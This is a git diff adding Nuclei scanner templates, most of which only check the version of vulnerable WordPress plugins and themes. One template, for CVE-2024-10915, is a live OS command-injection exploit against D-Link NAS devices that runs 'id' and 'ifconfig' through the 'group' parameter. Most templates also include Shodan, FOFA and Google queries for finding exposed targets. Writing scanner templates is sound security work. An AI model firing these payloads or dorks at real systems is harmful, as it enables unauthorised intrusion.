real.Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/83e1f631-28ec-4924-9d69-caaba00fe276?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12697 + metadata: + fofa-query: "wp-content/plugins/real-kit/" + google-query: inurl:"/wp-content/plugins/real-kit/" + shodan-query: 'vuln:CVE-2024-12697' + tags: cve,wordpress,wp-plugin,real-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/real-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "real-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12721.yaml b/poc/cve/CVE-2024-12721.yaml new file mode 100644 index 0000000000..f8505eccd8 --- /dev/null +++ b/poc/cve/CVE-2024-12721.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12721-e696c3790eb4b1341769185b659235b2 + +info: + name: > + Custom Product Tabs For WooCommerce <= 1.2.4 - Authenticated (Shop Manager+) PHP Object Injection + author: topscoder + severity: low + description: > + The Custom Product Tabs For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.4 via deserialization of untrusted input from the 'wb_custom_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-12721 + metadata: + fofa-query: "wp-content/plugins/wb-custom-product-tabs-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-12721' + tags: cve,wordpress,wp-plugin,wb-custom-product-tabs-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wb-custom-product-tabs-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12771.yaml b/poc/cve/CVE-2024-12771.yaml new file mode 100644 index 0000000000..0bd024c248 --- /dev/null +++ b/poc/cve/CVE-2024-12771.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12771-cd6721ae7264b86b9c92e3b0360445d3 + +info: + name: > + eCommerce Product Catalog Plugin for WordPress <= 3.3.43 - Cross-Site Request Forgery to Password Reset + author: topscoder + severity: medium + description: > + The eCommerce Product Catalog Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.43. This is due to missing or incorrect nonce validation on the 'customer_panel_password_reset' function. This makes it possible for unauthenticated attackers to reset the password of any administrator or customer account via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3513ec24-0b1b-4528-9f89-eee5654e4e98?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-12771 + metadata: + fofa-query: "wp-content/plugins/ecommerce-product-catalog/" + google-query: inurl:"/wp-content/plugins/ecommerce-product-catalog/" + shodan-query: 'vuln:CVE-2024-12771' + tags: cve,wordpress,wp-plugin,ecommerce-product-catalog,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ecommerce-product-catalog/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ecommerce-product-catalog" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.43') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12875.yaml b/poc/cve/CVE-2024-12875.yaml new file mode 100644 index 0000000000..8c67970045 --- /dev/null +++ b/poc/cve/CVE-2024-12875.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12875-fdfbb98d9e9a1f9c1127b7881e3d0e1b + +info: + name: > + Easy Digital Downloads <= 3.3.2 - Authenticated (Admin+) Arbitrary File Download + author: topscoder + severity: low + description: > + The Easy Digital Downloads – eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.2 via the file download functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec065da7-b8aa-414d-9673-5caf87ad45b5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-12875 + metadata: + fofa-query: "wp-content/plugins/easy-digital-downloads/" + google-query: inurl:"/wp-content/plugins/easy-digital-downloads/" + shodan-query: 'vuln:CVE-2024-12875' + tags: cve,wordpress,wp-plugin,easy-digital-downloads,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-digital-downloads/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-digital-downloads" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9545.yaml b/poc/cve/CVE-2024-9545.yaml new file mode 100644 index 0000000000..b26dd7f37b --- /dev/null +++ b/poc/cve/CVE-2024-9545.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9545-383a080b0508dbca93fe0cae0c28ae26 + +info: + name: > + Shortcodes and extra features for Phlox theme <= 2.16.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via aux_contact_box and aux_gmaps Shortcodes + author: topscoder + severity: low + description: > + The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aux_contact_box and aux_gmaps shortcodes in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/65ee0ac8-3fa0-4a7d-a786-36a914242634?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9545 + metadata: + fofa-query: "wp-content/plugins/auxin-elements/" + google-query: inurl:"/wp-content/plugins/auxin-elements/" + shodan-query: 'vuln:CVE-2024-9545' + tags: cve,wordpress,wp-plugin,auxin-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/auxin-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "auxin-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.16.4') \ No newline at end of file diff --git a/poc/injection/Command-Injection.yaml b/poc/injection/Command-Injection.yaml new file mode 100644 index 0000000000..e55b49fd14 --- /dev/null +++ b/poc/injection/Command-Injection.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-10915 + +info: + name: D-Link NAS - Command Injection via Group Parameter + author: s4e-io + severity: critical + description: | + A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection. + reference: + - https://www.usom.gov.tr/bildirim/tr-24-1836 + - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4 + - https://nvd.nist.gov/vuln/detail/CVE-2024-10915 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-10915 + cwe-id: CWE-78,CWE-707 + epss-score: 0.0408 + epss-percentile: 0.92375 + cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: dlink + product: dns-320_firmware + shodan-query: http.html:"sharecenter" + fofa-query: body="sharecenter" + tags: cve,cve2024,dlink,sharecenter,rce + +http: + - raw: + - | + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1 + Host: {{Hostname}} + + payloads: + command: + - "id" + - "ifconfig" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" + - "contains_all(body, 'inet addr:', 'Mask:')" + condition: or + + - type: dsl + dsl: + - 'contains(body, "Content-type: text/html")' + - "status_code == 200" + condition: and +# digest: 4b0a00483046022100bbc4e26d910b3948b3e37bbd063882ae16a09988e6798da089e5bd006f1ff7ed022100ee3139d82637396d87421c0e84185377ae8f02bfdd6e4897ba7b6c9646708aaa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/microsoft/smsa-shipping-official.yaml b/poc/microsoft/smsa-shipping-official.yaml new file mode 100644 index 0000000000..55a36a7081 --- /dev/null +++ b/poc/microsoft/smsa-shipping-official.yaml @@ -0,0 +1,59 @@ +id: smsa-shipping-official-f19b56a54562a16962217b4283cfecb5 + +info: + name: > + SMSA Shipping(official) <= 2.2 - Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/29d72347-ba49-45c6-a964-2c75064ac866?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/smsa-shipping-official/" + google-query: inurl:"/wp-content/plugins/smsa-shipping-official/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,smsa-shipping-official,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smsa-shipping-official/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smsa-shipping-official" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/other/adforest.yaml b/poc/other/adforest.yaml new file mode 100644 index 0000000000..f96302da10 --- /dev/null +++ b/poc/other/adforest.yaml @@ -0,0 +1,59 @@ +id: adforest-e83f34353ce1bb79d2c778a1988f4ca8 + +info: + name: > + AdForest <= 5.1.6 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f374b3d1-820b-473f-8d2b-c3267e6d23d9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/adforest/" + google-query: inurl:"/wp-content/themes/adforest/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,adforest,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/adforest/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adforest" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.6') \ No newline at end of file diff --git a/poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml b/poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml new file mode 100644 index 0000000000..368bdff54d --- /dev/null +++ b/poc/other/bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8.yaml @@ -0,0 +1,59 @@ +id: bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8 + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) <= 5.10.12 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.12') \ No newline at end of file diff --git a/poc/other/full-screen-menu-for-elementor.yaml b/poc/other/full-screen-menu-for-elementor.yaml new file mode 100644 index 0000000000..74e4961152 --- /dev/null +++ b/poc/other/full-screen-menu-for-elementor.yaml @@ -0,0 +1,59 @@ +id: full-screen-menu-for-elementor-d260d7eb2da867209574048a4e6c77b0 + +info: + name: > + Full Screen Menu for Elementor <= 1.0.7 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/full-screen-menu-for-elementor/" + google-query: inurl:"/wp-content/plugins/full-screen-menu-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,full-screen-menu-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-menu-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-menu-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.7') \ No newline at end of file diff --git a/poc/other/magicpost.yaml b/poc/other/magicpost.yaml new file mode 100644 index 0000000000..9978527c0e --- /dev/null +++ b/poc/other/magicpost.yaml @@ -0,0 +1,59 @@ +id: magicpost-6538fe9c7722fa6358b7d4a11ba3b7cc + +info: + name: > + MagicPost <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via wb_share_social Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/magicpost/" + google-query: inurl:"/wp-content/plugins/magicpost/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,magicpost,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/magicpost/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "magicpost" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/pingmeter-uptime-monitoring.yaml b/poc/other/pingmeter-uptime-monitoring.yaml new file mode 100644 index 0000000000..e717f84929 --- /dev/null +++ b/poc/other/pingmeter-uptime-monitoring.yaml @@ -0,0 +1,59 @@ +id: pingmeter-uptime-monitoring-d35d40cd86cecdbd3e5f2c06b9034e3c + +info: + name: > + Pingmeter Uptime Monitoring <= 1.0.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/pingmeter-uptime-monitoring/" + google-query: inurl:"/wp-content/plugins/pingmeter-uptime-monitoring/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,pingmeter-uptime-monitoring,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pingmeter-uptime-monitoring/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pingmeter-uptime-monitoring" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/other/woo-one-click-upsell-funnel.yaml b/poc/other/woo-one-click-upsell-funnel.yaml new file mode 100644 index 0000000000..6fa12be230 --- /dev/null +++ b/poc/other/woo-one-click-upsell-funnel.yaml @@ -0,0 +1,59 @@ +id: woo-one-click-upsell-funnel-98ebab5be77d58e4cde51e12bd3679c2 + +info: + name: > + One Click Upsell Funnel for WooCommerce <= 3.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via wps_wocuf_pro_yes Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-one-click-upsell-funnel/" + google-query: inurl:"/wp-content/plugins/woo-one-click-upsell-funnel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-one-click-upsell-funnel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-one-click-upsell-funnel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-one-click-upsell-funnel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9') \ No newline at end of file diff --git a/poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml b/poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml new file mode 100644 index 0000000000..a3e82a5640 --- /dev/null +++ b/poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml @@ -0,0 +1,59 @@ +id: wb-custom-product-tabs-for-woocommerce-0d6d3a2eb43a5b249c178d2b2d5f4cb5 + +info: + name: > + Custom Product Tabs For WooCommerce <= 1.2.4 - Authenticated (Shop Manager+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wb-custom-product-tabs-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wb-custom-product-tabs-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wb-custom-product-tabs-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.4') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml b/poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml new file mode 100644 index 0000000000..7bbd676400 --- /dev/null +++ b/poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636 + +info: + name: > + Schema App Structured Data <= 2.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48db673c-f978-45f4-9d7b-eddd81cee62e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11279 + metadata: + fofa-query: "wp-content/plugins/schema-app-structured-data-for-schemaorg/" + google-query: inurl:"/wp-content/plugins/schema-app-structured-data-for-schemaorg/" + shodan-query: 'vuln:CVE-2024-11279' + tags: cve,wordpress,wp-plugin,schema-app-structured-data-for-schemaorg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/schema-app-structured-data-for-schemaorg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "schema-app-structured-data-for-schemaorg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/web/gwebpro-store-locator.yaml b/poc/web/gwebpro-store-locator.yaml new file mode 100644 index 0000000000..cfdf98d2d4 --- /dev/null +++ b/poc/web/gwebpro-store-locator.yaml @@ -0,0 +1,59 @@ +id: gwebpro-store-locator-a48522809c277db29c19ddd5318a9a6f + +info: + name: > + G Web Pro Store Locator <= 2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gwebpro-store-locator/" + google-query: inurl:"/wp-content/plugins/gwebpro-store-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gwebpro-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gwebpro-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gwebpro-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/wordpress/wp-migrate-2-aws.yaml b/poc/wordpress/wp-migrate-2-aws.yaml new file mode 100644 index 0000000000..6da15ed022 --- /dev/null +++ b/poc/wordpress/wp-migrate-2-aws.yaml @@ -0,0 +1,59 @@ +id: wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809 + +info: + name: > + WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-migrate-2-aws/" + google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-migrate-2-aws" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.1') \ No newline at end of file